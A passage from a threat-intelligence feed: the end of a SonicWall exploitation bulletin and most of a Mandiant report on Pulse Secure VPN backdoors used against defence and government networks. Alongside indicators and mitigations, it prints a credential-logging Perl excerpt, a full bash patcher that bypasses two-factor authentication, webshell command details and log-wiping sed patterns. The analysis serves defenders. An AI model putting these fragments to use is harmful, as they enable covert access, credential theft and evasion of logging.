Techniques\n\nFireEye detects this activity across our platforms. The following contains specific detection names that provide an indicator of SonicWall ES exploitation or post-exploitation activities associated with this adversary.\n\n**Product**\n\n| \n\n**Signature** \n \n---|--- \n \nFireEye Endpoint Security\n\n| \n\n * RUNDLL32.EXE COMSVCS.DLL PROCESS MINIDUMP (METHODOLOGY)\n * SUSPICIOUS REGISTRY EXPORTS (METHODOLOGY)\n * WEB SERVER ECHO REDIRECT (METHODOLOGY)\n * WEB SERVER CMD.EXE TYPE RECON (METHODOLOGY) \n \nFireEye Network Security\n\nFireEye Email Security\n\nFireEye Detection On Demand\n\nFireEye Malware File Scanning\n\nFireEye Malware File Storage Scanning\n\n| \n\n * FE_PUP_Exploit_Linux_ZipSlip_1\n * FE_Exploit_Win_ZipSlip_1\n * FE_Trojan_ZIP_Generic_1\n * FE_Webshell_JSP_BEHINDER_1\n * FEC_Webshell_JSP_BEHINDER_1\n * Webshell.JSP.BEHINDER\n * Webshell.JSP.BEHINDER.MVX \n \nFireEye Helix\n\n| \n\n * METHODOLOGY - LFI [Null-Byte URI]\n * WMIEXEC UTILITY [Args]\n * WINDOWS METHODOLOGY [Unusual Web Server Child Process] \n \nAdditionally, SonicWall has deployed Intrusion Prevention System (IPS) signatures to SonicWall firewalls to help detect and block attacks that attempt to leverage the aforementioned vulnerabilities. The following signatures have already been applied to SonicWall firewalls with active security subscriptions:\n\n * **IPS Signature**: 15520 WEB-ATTACKS SonicWall Email Security (CVE-2021-20022 Vulnerability)\n * **IPS Signature**: 1067 WEB-ATTACKS Web Application Directory Traversal Attack 7\n * **IPS Signature**: 15509 WEB-ATTACKS Web Application Directory Traversal Attack 7 -c2\n\n#### Mandiant Security Validation Actions\n\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\n\n**VID**\n\n| \n\n**Name** \n \n---|--- \n \nA101-563\n\n| \n\nMalicious File Transfer - BEHINDER, Download, Variant #1 \n \nA101-566\n\n| \n\nWeb Shell Activity - BEHINDER, Basic Shell Interaction \n \nA101-564\n\n| \n\nMalicious File Transfer - Zip Slip, Download, EICAR Variant \n \nA101-565\n\n| \n\nPhishing Email - Malicious Attachment, Zip Slip, Generic Themed Lure \n \n#### Vulnerability Disclosure\n\nMandiant disclosed the vulnerabilities CVE-2021-20021 and CVE-2021-20022 to SonicWall Product Security Incident Response Team (PSIRT) on March 26, 2021. The vulnerabilities were acknowledged and validated on March 29, 2021 and a hotfix became available on April 9, 2021. The patch was communicated to impacted SonicWall customers and partners on April 9, 2021. \n \nMandiant disclosed the vulnerability CVE-2021-20023 to SonicWall PSIRT on April 6, 2021. The vulnerability was acknowledged and validated on April 9, 2021 and a patch became available April 19.\n\nTo mitigate the three CVEs, Mandiant and SonicWall recommend upgrading Email Security to version 10.0.9.6173 (Windows) or 10.0.9.6177 (Hardware &amp; ESXi Virtual Appliances). Organizations using SonicWall Hosted Email Security (HES) products were automatically updated and no action is required for those customers.\n\n#### Acknowledgements\n\nSonicWall PSIRT, Charles Carmakal, Ben Fedore, Geoff Ackerman and Andrew Thompson.\n", "modified": "2021-04-20T21:00:00", "published": "2021-04-20T21:00:00", "id": "FIREEYE:F52E9D08724DC89168C734FC17EBF034", "href": "https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html", "type": "fireeye", "title": "Zero-Day Exploits in SonicWall Email Security Lead to Enterprise Compromise", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-10T17:30:40", "bulletinFamily": "info", "cvelist": ["CVE-2021-20021", "CVE-2021-20023", "CVE-2021-22893"], "description": "#### Executive Summary\n\n * Mandiant recently responded to multiple security incidents involving compromises of Pulse Secure VPN appliances.\n * This blog post examines multiple, related techniques for bypassing single and multifactor authentication on Pulse Secure VPN devices, persisting across upgrades, and maintaining access through webshells.\n * The investigation by Pulse Secure has determined that a combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), are responsible for the initial infection vector.\n * Pulse Secure\u2019s parent company, Ivanti, released mitigations for a vulnerability exploited in relation to these malware families and the [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) for their customers to determine if their systems are impacted. A final patch to address the vulnerability will be available in early May 2021.\n * Pulse Secure has been working closely with Mandiant, affected customers, government partners, and other forensic experts to address these issues.\n * There is no indication the identified backdoors were introduced through a supply chain compromise of the company\u2019s network or software deployment process.\n\n#### Introduction\n\nMandiant is currently tracking 12 malware families associated with the exploitation of Pulse Secure VPN devices. These families are related to the circumvention of authentication and backdoor access to these devices, but they are not necessarily related to each other and have been observed in separate investigations. It is likely that multiple actors are responsible for the creation and deployment of these various code families.\n\nThe focus of this report is on the activities of UNC2630 against U.S. Defense Industrial base (DIB) networks, but detailed malware analysis and detection methods for all samples observed at U.S. and European victim organizations are provided in the technical annex to assist network defenders in identifying a large range of malicious activity on affected appliances. Analysis is ongoing to determine the extent of the activity.\n\nMandiant continues to collaborate with the Ivanti and Pulse Secure teams, Microsoft Threat Intelligence Center (MSTIC), and relevant government and law enforcement agencies to investigate the threat, as well as develop recommendations and mitigations for affected Pulse Secure VPN appliance owners.\n\nAs part of their investigation, Ivanti has released mitigations for a vulnerability exploited in relation to this campaign as well as the [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to assist with determining if systems have been impacted.\n\n#### Details\n\nEarly this year, Mandiant investigated multiple intrusions at defense, government, and financial organizations around the world. In each intrusion, the earliest evidence of attacker activity traced back to DHCP IP address ranges belonging to Pulse Secure VPN appliances in the affected environment.\n\nIn many cases, we were not able to determine how actors obtained administrator-level access to the appliances. However, based on analysis by Ivanti, we suspect some intrusions were due to the exploitation of previously disclosed Pulse Secure vulnerabilities from 2019 and 2020 while other intrusions were due to the exploitation of [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>).\n\nWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments. In order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance. This was done to accomplish the following:\n\n 1. Trojanize shared objects with malicious code to log credentials and bypass authentication flows, including multifactor authentication requirements. We track these trojanized assemblies as SLOWPULSE and its variants.\n 2. Inject webshells we currently track as RADIALPULSE and PULSECHECK into legitimate Internet-accessible Pulse Secure VPN appliance administrative web pages for the devices.\n 3. Toggle the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem.\n 4. Maintain persistence across VPN appliance general upgrades that are performed by the administrator.\n 5. Unpatch modified files and delete utilities and scripts after use to evade detection.\n 6. Clear relevant log files utilizing a utility tracked as THINBLOOD based on an actor defined regular expression.\n\nIn a separate incident in March 2021, we observed UNC2717 using RADIALPULSE, PULSEJUMP, and HARDPULSE at a European organization. Although we did not observe PULSEJUMP or HARDPULSE used by UNC2630 against U.S. DIB companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630. We also observed an OpenSSL library file modified in similar fashion as the other trojanized shared objects. We believe that the modified library file, which we\u2019ve named LOCKPICK, could weaken encryption for communications used by the appliance, but do not have enough evidence to confirm this.\n\nDue to a lack of context and forensic evidence at this time, Mandiant cannot associate all the code families described in this report to UNC2630 or UNC2717. We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected APT actors. It is likely that additional groups beyond UNC2630 and UNC2717 have adopted one or more of these tools. Despite these gaps in our understanding, we included detailed analysis, detection techniques, and mitigations for all code families in the Technical Annex.\n\n#### SLOWPULSE\n\nDuring our investigation into the activities of UNC2630, we uncovered a novel malware family we labeled SLOWPULSE. This malware and its variants are applied as modifications to legitimate Pulse Secure files to bypass or log credentials in the authentication flows that exist within the legitimate Pulse Secure shared object libdsplibs.so. Three of the four discovered variants enable the attacker to bypass two-factor authentication. A brief overview of these variants is covered in this section, refer to the Technical Annex for more details.\n\n##### SLOWPULSE Variant 1__\n\nThis variant is responsible for bypassing LDAP and RADIUS-2FA authentication routines if a secret backdoor password is provided by the attacker. The sample inspects login credentials used at the start of each protocol\u2019s associated routine and strategically forces execution down the successful authentication patch if the provided password matches the attacker's chosen backdoor password.\n\n_LDAP Auth Bypass_\n\nThe routine DSAuth::LDAPAuthServer::authenticate begins the LDAP authentication procedure. This variant inserts a check against the backdoor password after the bind routine so that the return value can be conditionally stomped to spoof successful authentication.\n\n \nFigure 1: LDAP Auth Bypass\n\n_RADIUS Two Factor Auth Bypass_\n\nThe routine DSAuth::RadiusAuthServer::checkUsernamePassword begins the RADIUS-2FA authentication procedure. This variant inserts checks against the backdoor password after the RADIUS authentication packet is received back from the authentication server. If the backdoor password is provided by the attacker, the packet type and successful authentication status flags are overwritten to spoof successful authentication.\n\n \nFigure 2: Radius-2FA Bypass\n\n##### SLOWPULSE Variant 2\n\n_ACE Two Factor Auth Credential Logging_\n\nThis variant logs credentials used during the ACE-2FA authentication procedure DSAuth::AceAuthServer::checkUsernamePassword. Rather than bypassing authentication, this variant logs the username and password to a file for later use by the attacker.\n\n \nFigure 3: ACE Auth Credential Log\n\n##### SLOWPULSE Variant 3\n\n_ACE Two Factor Auth Bypass_\n\nThis variant is responsible for bypassing the ACE-2FA logon procedure starting with DSAuth::AceAuthServer::checkUsernamePassword. The flow of the authentication procedure is modified to bypass the routine responsible for verifying the username and password if the backdoor password is provided. With this modification the attacker can spoof successful authentication.\n\n \nFigure 4: ACE Auth Bypass Variant\n\n##### SLOWPULSE Variant 4\n\n_RealmSignin Two Factor Auth Bypass_\n\nThis variant bypasses the RealmSignin::runSecondaryAuth procedure of the Pulse Secure VPN. The inserted logic modifies the execution flow of a specific step of the login process to spoof successful authentication. We believe that this may be a two-factor authentication bypass.\n\n \nFigure 5: RealmSignIn 2FA Auth Bypass\n\n#### Attribution\n\nWe are in the early stages of gathering evidence and making attribution assessments and there are a number of gaps in our understanding of UNC2630, UNC2717, and these 12 code families. Nevertheless, the Mandiant and Ivanti teams are proactively releasing this analysis to assist network defenders in triaging and identifying malicious activity on affected appliances.\n\nMandiant is able to assess that:\n\n * UNC2630 targeted U.S. DIB companies with SLOWPULSE, RADIALPULSE, THINBLOOD, ATRIUM, PACEMAKER, SLIGHTPULSE, and PULSECHECK as early as August 2020 until March 2021.\n * We suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5\n * UNC2717 targeted global government agencies between October 2020 and March 2021 using HARDPULSE, QUIETPULSE, AND PULSEJUMP.\n * We do not have enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group.\n * We do not have enough information about the use of LOCKPICK to make an attribution statement.\n\n##### UNC2630\n\nUNC2630\u2019s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed them during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5. We have also uncovered limited evidence to suggest that UNC2630 operates on behalf of the Chinese government. Analysis is still ongoing to determine the full scope of the activity that maybe related to the group.\n\nAlthough we are not able to definitively connect UNC2630 to APT5, or any other existing APT group, a trusted third party has uncovered evidence connecting this activity to historic campaigns which Mandiant tracks as Chinese espionage actor APT5. While we cannot make the same connections, the third party assessment is consistent with our understanding of APT5 and their historic TTPs and targets.\n\nAPT5 has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances. They have also consistently targeted defense and technology companies in the U.S., Europe, and Asia.\n\n * As early as 2014, Mandiant Incident Response discovered APT5 making unauthorized code modifications to files in the embedded operating system of another technology platform.\n * In 2015, APT5 compromised a U.S. telecommunications organization providing services and technologies for private and government entities. During this intrusion, the actors downloaded and modified some of the router images related to the company\u2019s network routers.\n * Also during this time, APT5 stole files related to military technology from a South Asian defense organization. Observed filenames suggest the actors were interested in product specifications, emails concerning technical products, procurement bids and proposals, and documents on unmanned aerial vehicles (UAVs).\n * APT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.\n\n#### Recommendations\n\nAll Pulse Secure Connect customers should assess the impact of the Pulse Secure mitigations and apply it if possible. Organizations should utilize the most recent version of Pulse Secure\u2019s Integrity Assurance utility [released](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) on March 31, 2021. If a device fails this Integrity Assurance utility, network administrators should follow the [instructions here](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) and contact their Pulse CSR for additional guidance.\n\nOrganizations should examine available forensic evidence to determine if an attacker compromised user credentials. Ivanti highly recommends resetting all passwords in the environment and reviewing the configuration to ensure no service accounts can be used to authenticate to the vulnerability.\n\nAdditional detections, mitigations and relevant MITRE ATT&amp;CK techniques are included in the Technical Annex. Sample hashes and analysis are included to enable defenders to quickly assess if their respective appliances have been affected. Yara rules, Snort rules, and hashes are published on [Mandiant\u2019s GitHub page](<https://github.com/fireeye/pulsesecure_exploitation_countermeasures/>).\n\n#### Detections and Mitigations\n\n1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc\n\n * HARDPULSE contains an embedded 'recovery' URL https://ive-host/dana-na/auth/recover[.]cgi?token=&lt;varies&gt; that may be accessed by an attacker. The sample uses the POST parameters checkcode, hashid, m, and filename. This URL is not present in legitimate versions of this file.\n\n7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a\n\n68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2\n\nd72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b\n\n * PULSEJUMP, RADIALPULSE AND PACEMAKER use the following files to record credentials:\n * /tmp/dsactiveuser.statementcounters\n * /tmp/dsstartssh.statementcounters\n * /tmp/dsserver-check.statementcounters\n\ncd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68\n\n * The malicious operations of SLOWPULSE can be detected via log correlation between the authentication servers responsible for LDAP and RADIUS auth and the VPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing success would be an anomalous event worthy of flagging.\n\na1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1\n\n * Upon invocation of the PULSECHECK webshell, the following HTTP request headers will be sent:\n\n**Key**\n\n| \n\n**Value** \n \n---|--- \n \nREQUEST_METHOD\n\n| \n\nPOST \n \nHTTP_X_KEY\n\n| \n\n&lt;BackdoorKey&gt; \n \nHTTP_X_CNT\n\n| \n\n&lt;RC4Key&gt; \n \nHTTP_X_CMD\n\n| \n\n&lt;RC4Command&gt; \n \n1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd\n\n * SLOWPULSE VARIANT 2 writes ACE logon credentials to the file /home/perl/PAUS.pm in a+ (append) mode, using the format string %s:%s\\n.\n\n68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2\n\n * PACEMAKER is saved at filepath /home/bin/memread\n * Executed with commandline flags \u2013t, -m, -s\n * Attaches to victim processes with PTRACE and opens subfiles in /proc/\n\n88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079\n\n * THINBLOOD creates the files:\n * /home/runtime/logs/log.events.vc1\n * /home/runtime/logs/log.events.vc2\n * /home/runtime/logs/log.access.vc1\n * /home/runtime/logs/log.access.vc2\n * Executes the system API with the mv command specifying one of the files above, targeting:\n * /home/runtime/logs/log.access.vc0\n * /home/runtime/logs/log.events.vc0\n * Executes the rm command specify one of the .vc1 files above\n\n133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a\n\n * SLIGHTPULSE uses /tmp/1 as command execution log\n * All POST requests to meeting_testjs.cgi are suspicious\n * POST parameters: cert, img, name are used by malicious logic\n * Responses to the endpoint with the name parameter respond with no-cache and image/gif\n\n1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9\n\n * THINBLOOD execution of sed on the files:\n * log.events.vc0\n * log.access.vc0\n * Log.admin.vc0\n * Sed patterns used:\n * s/.\\x00[^\\x00]*&lt;regex_string&gt;[^\\x00]*\\x09.\\x00//g\n * s/\\x&lt;hex_char&gt;\\x00[^\\x00]*&lt;regex_string&gt;[^\\x00]*\\x09\\x&lt;hex_char&gt;\\x00//g\n\n06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7\n\n * The sample accepts an input and output file as its first and second arguments, then writes a patched version of the input out. The commandline argument e or E must be supplied as the fourth argument. Example command line:\n * ./patcher input.bin output.bin backdoorkey e\n\nf2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90\n\n * The sample uses the HTTP query parameter id and responds with HTTP headers \"Cache-Control: no-cache\\n\" and \"Content-type: text/html\\n\\n\".\n\n224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450\n\n64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7\n\n78d7c7c9f800f6824f63a99d935a4ad0112f97953d8c100deb29dae24d7da282\n\n705cda7d1ace8f4adeec5502aa311620b8d6c64046a1aed2ae833e2f2835154f\n\n * Execute sed on PulseSecure system files\n * Remounts filesystem as writable: system(\"/bin/mount -o remount,rw /dev/root /\")\n * Unexpected execution of other system commands such as tar, cp, rm\n\n#### MITRE ATT&amp;CK Techniques\n\nThe following list of MITRE ATT&amp;CK techniques cover all malware samples described in this report as well as those observed throughout the lifecycle of UNC2630 and UNC2717.\n\n * T1003-OS Credential Dumping\n * T1016-System Network Configuration Discovery\n * T1021.001-Remote Desktop Protocol\n * T1027-Obfuscated Files or Information\n * T1036.005-Match Legitimate Name or Location\n * T1048-Exfiltration Over Alternative Protocol\n * T1049-System Network Connections Discovery\n * T1053-Scheduled Task/Job\n * T1057-Process Discovery\n * T1059-Command and Scripting Interpreter\n * T1059.003-Windows Command Shell\n * T1070-Indicator Removal on Host\n * T1070.001-Clear Windows Event Logs\n * T1070.004-File Deletion\n * T1071.001-Web Protocols\n * T1082-System Information Discovery\n * T1098-Account Manipulation\n * T1105-Ingress Tool Transfer\n * T1111-Two-Factor Authentication Interception\n * T1133-External Remote Services\n * T1134.001 Access Token Manipulation: Token Impersonation/Theft\n * T1136-Create Account\n * T1140-Deobfuscate/Decode Files or Information\n * T1190-Exploit Public-Facing Application\n * T1505.003-Web Shell\n * T1518-Software Discovery\n * T1554-Compromise Client Software Binary\n * T1556.004-Network Device Authentication\n * T1592.004 Gather Victim Host Information: Client Configurations\n * T1562 Impair Defenses\n * T1569.002-Service Execution\n * T1574 Hijack Execution Flow \n * T1600-Weaken Encryption\n\n \nFigure 6: MITRE ATT&amp;CK Map\n\n#### Technical Annex\n\n##### SLIGHTPULSE\n\nThe file meeting_testjs.cgi (SHA256: 133631957d41eed9496ac2774793283ce26f8772de226e7f520d26667b51481a) is a webshell capable of arbitrary file read, write, and command execution. Malicious logic is inserted at the end of legitimate logic to respond to POST requests. We believe this webshell may be responsible for placing additional webshells and used to modify legitimate system components resulting in the other observed malware families due to its functionality.\n\nThe malicious logic inserts a branch condition to respond to HTTP POST requests rather than just the typical GET requests expected of the legitimate code. If GET requests are performed the legitimate logic is still invoked. POST requests have a series of parameters checked for existence to determine which command to invoke. This logic is:\n\n**POST params**\n\n| \n\n**Invoked Command** \n \n---|--- \n \ncert\n\n| \n\nwritefile \n \nimg, name with nonempty value\n\n| \n\nreadfile \n \nimg set to empty string \"\", name\n\n| \n\nexeccmd \n \nanything else\n\n| \n\ninvoke original legitimate logic \n \n \nFigure 7: Webshells respond to POSTs\n\nAll incoming and outgoing requests are base64 encoded/decoded and RC4 encrypted/decrypted. The scheme is simple. The first six characters of the data are a random key generated per request as a sort of nonce, with the static RC4 key appended. This nonce + phrase together act as the RC4 key. The phrase is not sent over the wire, only the nonce. This entire key is then used to encrypt/decrypt payload data that immediately follows the key. The form of data on the wire is:\n\nOutbound/Inbound:\n\n&lt;6randbytes&gt;&lt;encrypted_data&gt; \n^-RC4NONCE-^\n\nUsage:\n\n&lt;6randbytes&gt;&lt;rc4_phrase&gt;&lt;encrypted_data&gt; \n^-------RC4 KEY--------^\n\n_ReadFile_\n\nThis command accepts a base64 encoded, RC4 encrypted file name via the img parameter and opens it for read. The file contents are read in full then sent back to the attacker as base64 encoded, RC4 encrypted data with the headers \"Content-type: application/x-download\\n\", and form header \"Content-Disposition: attachment; filename=tmp\\n\\n\".\n\n_WriteFile_\n\nThis command accepts a base64 encoded, RC4 encrypted filename via the cert parameter, and base64 encoded, RC4 encrypted file data via the parameter md5. The filename is opened in write mode with the file data being written to the file before the file is closed. The results of this command are sent back to the attacker, using the headers \"Cache-Control: no-cache\\n\" and \"Content-type: text/html\\n\\n\".\n\n_Execute_\n\nThis command accepts a base64 encoded, RC4 encrypted commands via the name parameter. The malicious logic forbids the cd command and will respond with the text Error 404 if executed. All other commands will be executed via the system API with output piped to the file /tmp/1. The full system command is &lt;command&gt; &gt;/tmp/1 2&gt;&amp;1. The output of this execution is read and sent back to the attacker base64 encoded, RC4 encrypted. The headers \"Cache-Control: no-cache\\n\" and \"Content-type: image/gif\\n\\n\" are used. The response appears to be masquerading as a GIF when sending back this command output.\n\n##### RADIALPULSE__\n\nThe file with the SHA256 hash d72daafedf41d484f7f9816f7f076a9249a6808f1899649b7daa22c0447bb37b is a modified Perl script associated with a PulseSecure web-based tool which causes usernames, passwords and information associated with logins to this application to be written to the file /tmp/dsstartssh.statementcounters.\n\nRetrieval of these login credentials must be achieved through other means such as an interactive login or a webshell. Persistence is achieved by the addition of compromised code which is continually served when requesting this PulseSecure webpage.\n\nAn excerpt of the code related to credential stealing is shown as follows:\n\nmy $realmName1 = $signin-&gt;getRealmInfo()-&gt;{name}; \n\nopen(*fd, \"&gt;&gt;/tmp/dsstartssh.statementcounters\"); \n\nsyswrite(*fd, \"realm=$realmName1 \", 5000); \n\nsyswrite(*fd, \"username=$username \", 5000); \n\nsyswrite(*fd, \"password=$password\\n\", 5000); \n\nclose(*fd);\n\n##### SLOWPULSE Variant 1__\n\nThe file libdsplibs.so with SHA256 cd09ec795a8f4b6ced003500a44d810f49943514e2f92c81ab96c33e1c0fbd68 is a trojanized ELF shared object belonging to the PulseSecure VPN server. The sample has been modified to bypass specific authentication mechanisms of the LDAP and RADIUS protocols. The sample hardcodes a backdoor key that will silently subvert auth failures if the correct backdoor key is passed, establishing a VPN connection as if auth succeeded. If the backdoor password is not used, authentication will fail as normal.\n\nIn multiple locations assembly is written into the padding regions between legitimate functions. As these regions are very small, around 20 bytes, the malicious logic stitches itself together by unconditionally jumping between multiple padding regions. The assembly is written in a way very similar to mid-function hooks, where it is common to push and then pop all flags and registers before and after the injected logic. By preserving registers and flags in this way the malicious logic is able to execute and perform its malicious logic as a passive observer if desired, only effecting the control flow in specific conditions. This is employed in two locations, the LDAP and RADIUS authentication routines, DSAuth::LDAPAuthServer::authenticate and DSAuth::RadiusAuthServer::checkUsernamePassword respectively.\n\n_LDAP Auth Bypass_\n\nIn the typical execution of DSAuth::LDAPAuthServer::authenticate the legitimate application constructs the C++ object DSAuth::LDAPAuthServer::ldap then passes it to DSLdapServer::bind with the username and password for login. This bind may fail or succeed which determines the authentication failure or success of the LDAP protocol. The malicious logic inserted into the application redirects execution before DSLdapServer::bind just after the ldap object is constructed. At this point in execution the username and password are easily extracted from memory with mid-function hooking techniques, which the sample copies to a code cave in memory between two functions as a temporary storage location. The malicious logic then invokes DSLdapServer::bind as the normal logic would, which sets the return register EAX to 0 or 1 for failure or success. A check is then executed where the temporary password copy made earlier is checked against a hardcoded backdoor password. If this check passes the backdoor logic actives by overwriting EAX to 1 to force the application down the execution path of successful authentication, even though in reality authentication failed.\n\n##### RADIUS Two Factor Auth Bypass\n\nIn the typical execution of DSAuth::RadiusAuthServer::checkUsernamePassword the legitimate application sends a RADIUS-2FA auth packet with username and password via RadiusAuthPacket::sendRadiusPacket. The response is then retrieved and parsed by the routine DSAuth::RadiusAuthServer::handleResponse. After packet retrieval the packet type is verified to be 3, it's not known what this packet type specifies but this is the packet type of a successful authentication response. If the packet type check passes, then the sample reads a field of the packet that specifies if authentication was successful or not and then checks this status later. The inserted malicious logic hijacks execution just after DSAuth::RadiusAuthServer::handleResponse where the password sent to the RADIUS server is checked against a backdoor password. If this check passes the malicious logic overwrites the retrieved packet with values indicating that it's of type 3 and that authentication was successful. The malicious logic then rejoins the original execution flow where the packet type is checked. If written the spoofed values force the application down the execution path of successful authentication, even though in reality authentication failed.\n\n##### SLOWPULSE Variant 2\n\n_ACE Two Factor Auth Credential Logging_\n\nWe also identified a variant of SLOWPULSE (SHA256: 1ab50b77dd9515f6cd9ed07d1d3176ba4627a292dc4a21b16ac9d211353818bd) which logs credentials used during ACE-2FA protocol authentication.\n\nThe backdoor is implemented in the routine DSAuth::AceAuthServer::checkUsernamePassword. As part of the login procedure the username and password are retrieved then written into a map entry structure. The backdoor inserts an unconditional jump into the logon logic that takes this map entry structure, reads the username and password fields, then writes them to the file /home/perl/PAUS.pm in a+ (append) mode, using the format string %s:%s\\n. The backdoor then unconditionally jumps back into the normal control flow to continue the logon process as normal.\n\n##### SLOWPULSE Variant 3\n\n_ACE Two Factor Auth Bypass_\n\nWe Identified another variant of SLOWPULSE (SHA256: b1c2368773259fbfef425e0bb716be958faa7e74b3282138059f511011d3afd9) which is similar to SLOWPULSE VARIANT 2 the malicious logic lives within DSAuth::AceAuthServer::checkUsernamePassword, however this variant bypasses the logon procedure rather than login credentials. Typical execution of this routine calls DsSecID_checkLogin to validate the username and password which sets the EAX register to 1. The routine DSAuth::AceAuthServer::handleACEAuthResult then checks EAX to determine if auth was successful or not. The malicious logic hijacks execution immediately after the username and password fields are written to their map entries, then checks if the password matches the backdoor password. If the password matches, then the EAX register is overwritten to 1. This puts the program in the same state as if DsSecID_checkLogin had successfully executed, but unlike SLOWPULSE VARIANT 1 the original authentication routine is not called at all. The malicious logic then rejoins execution before DSAuth::AceAuthServer::handleACEAuthResult which will now pass. This forces the application down the execution path of successful authentication, even though in reality authentication would have failed.\n\n##### SLOWPULSE Variant 4\n\n_RealmSignin Two Factor Auth Bypass_\n\nWe identified a fourth variant of SLOWPULSE responsible for bypassing what may be the two-factor authentication step of the DSAuth::RealmSignin process. The backdoor is present within the function DSAuth::RealmSignin::runSigninStep.This routine is responsible for multiple steps of the login procedure and is implemented as a large switch statement. Case 11 of the switch statement typically calls the routines DSMap::setPrivacyKeyNames then DSAuth::RealmSignin::runSecondaryAuth. The malicious logic in this variant overwrites the call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1. This forces application flow as if DSAuth::RealmSignin::runSecondaryAuth always succeeds, without ever calling it. We were not able to recover a file with these patches applied as the attacker removed their patches after use. However, we did uncover both the patcher and unpatcher utilities. We do not provide a hash for this file as we have not recovered it from a system in the field. This analysis was performed by replaying the changes performed by the patcher we did recover.\n\n##### SLOWPULSE Variant 2 Patcher\n\nAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert the malicious logic into the original libdsplibs.so file. The file with SHA256: c9b323b9747659eac25cec078895d75f016e26a8b5858567c7fb945b7321722c is responsible for inserting SLOWPULSE V2 malicious logic to log ACE credentials. The patcher accepts two command line arguments, the path to the original binary and the patched output file path. The original binary is read into memory, patched, and then written to the output path. The assembly patches and offsets into the original binary are hardcoded.\n\n##### SLOWPULSE Variant 3 Patcher\n\nAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to insert the malicious logic into the original libdsplibs.so file. The file with SHA256: 06c56bd272b19bf7d7207443693cd1fc774408c4ca56744577b11fee550c23f7 is responsible for inserting SLOWPULSE V3 malicious logic to bypass ACE logon authentication process. The patcher accepts four arguments. The first argument is the original binary path, the second the patched output file path, third is the backdoor bypass password, and fourth is the letter e specifying to apply patches. The sample reads the original binary into memory, applies the assembly patches associated with SLOWPULSE V3, as well as the provided bypass password, then written to the output path. The assembly patches, and all offsets including where to copy the bypass password are hardcoded.\n\n##### SLOWPULSE Variant 4 Patcher\n\nAs part of our investigation into the SLOWPULSE family we recovered the utility the attacker used to insert the malicious logic into the original libdsplibs.so file. The file with SHA256: e63ab6f82c711e4ecc8f5b36046eb7ea216f41eb90158165b82a6c90560ea415 responsible for inserting the patch for SLOWPULSE V3. The patch applied overwrites a single call to DSAuth::RealmSignin::runSecondaryAuth with mov eax, 1. This patcher utility is a simple bash script, unlike the previous patchers which were compiled applications likely written in C. The script in full is:\n\nprintf '\\xB8' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B31)) \nprintf '\\x01' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B32)) \nprintf '\\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B33)) \nprintf '\\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B34)) \nprintf '\\x00' | dd conv=notrunc of=/home/lib/libdsplibs.so bs=1 count=1 seek=$((0x5C7B35))\n\n##### SLOWPULSE Variant 4 UnPatcher\n\nAs part of our investigation into the SLOWPULSE family we were able to recover the utility used by the attacker to remove the malicious logic into the original libdsplibs.so file for SLOWPULSE V4. The attacker chose to remove the patches applied to libdsplibs.so. The file with SHA256: b2350954b9484ae4eac42b95fae6edf7a126169d0b93d79f49d36c5e6497062a is the unpatcher utility for SLOWPULSE V4. This sample is also a simple bash script, in full it is:\n\nprintf 